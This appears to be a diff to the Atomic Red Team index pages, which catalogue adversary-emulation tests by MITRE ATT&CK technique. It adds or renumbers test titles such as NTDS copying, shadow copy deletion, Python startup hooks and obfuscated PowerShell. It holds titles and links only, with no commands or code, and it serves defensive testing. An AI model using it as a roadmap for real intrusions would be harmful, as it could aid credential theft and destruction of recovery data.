  - Atomic Test #24: Account Enumeration with LDAPDomainDump [linux]
@@ -750,6 +756,7 @@
  - Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
 - [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #3: System Service Discovery - systemctl/service [linux]
+  - Atomic Test #8: System Service Discovery - Linux init scripts [linux]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
  - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -791,7 +798,9 @@
  - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
-  - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
+  - Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
+  - Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
+  - Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
@@ -13,6 +13,7 @@
 - [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -284,7 +285,9 @@
 - T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -361,9 +364,8 @@
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
-  - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
-  - Atomic Test #3: Firefox [linux, windows, macos]
-  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+  - Atomic Test #2: Firefox [linux, windows, macos]
+  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -411,7 +413,9 @@
 - T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -655,7 +659,9 @@
  - Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1652 Device Driver Discovery](../../T1652/T1652.md)
+  - Atomic Test #4: List loaded kernel extensions (macOS) [macos]
+  - Atomic Test #5: Find Kernel Extensions (macOS) [macos]
 - T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #2: View sudoers access [linux, macos]
@@ -669,7 +675,8 @@
  - Atomic Test #7: Check if System Integrity Protection is enabled [macos]
  - Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
 - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1007 System Service Discovery](../../T1007/T1007.md)
+  - Atomic Test #5: System Service Discovery - macOS launchctl [macos]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
  - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
@@ -704,7 +711,8 @@
  - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
  - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
-  - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
+  - Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
+  - Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
@@ -505,6 +505,7 @@
  - Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
  - Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
  - Atomic Test #10: Execution from Compressed JScript File [windows]
+  - Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
@@ -875,7 +876,9 @@
 - [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -1106,10 +1109,9 @@
  - Atomic Test #2: Modify Terminal Services DLL Path [windows]
 - [T1176 Browser Extensions](../../T1176/T1176.md)
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
-  - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
-  - Atomic Test #3: Firefox [linux, windows, macos]
-  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-  - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
+  - Atomic Test #2: Firefox [linux, windows, macos]
+  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
+  - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -1338,7 +1340,9 @@
 - [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1197 BITS Jobs](../../T1197/T1197.md)
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -1505,6 +1509,7 @@
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
  - Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
+  - Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
  - Atomic Test #1: Input Capture [windows]
@@ -1774,6 +1779,8 @@
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
+  - Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
+  - Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -1861,6 +1868,8 @@
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
  - Atomic Test #4: Get-Service Execution [windows]
+  - Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
+  - Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #4: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #5: Windows Internal Packet Capture [windows]
@@ -1954,7 +1963,8 @@
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
-  - Atomic Test #4: System Discovery using SharpView [windows]
+  - Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
+  - Atomic Test #7: System Discovery using SharpView [windows]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1654 Log Enumeration](../../T1654/T1654.md)
  - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
@@ -2085,7 +2095,8 @@
  - Atomic Test #10: Akira Ransomware drop Files with .akira Extension and Ransomnote [windows]
 - T1667 Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1496 Resource Hijacking](../../T1496/T1496.md)
+  - Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
 - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
  - Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
@@ -2105,6 +2116,7 @@
  - Atomic Test #9: Disable System Restore Through Registry [windows]
  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
  - Atomic Test #11: Modify VSS Service Permissions [windows]
+  - Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -4,7 +4,7 @@
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -27,7 +27,7 @@
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
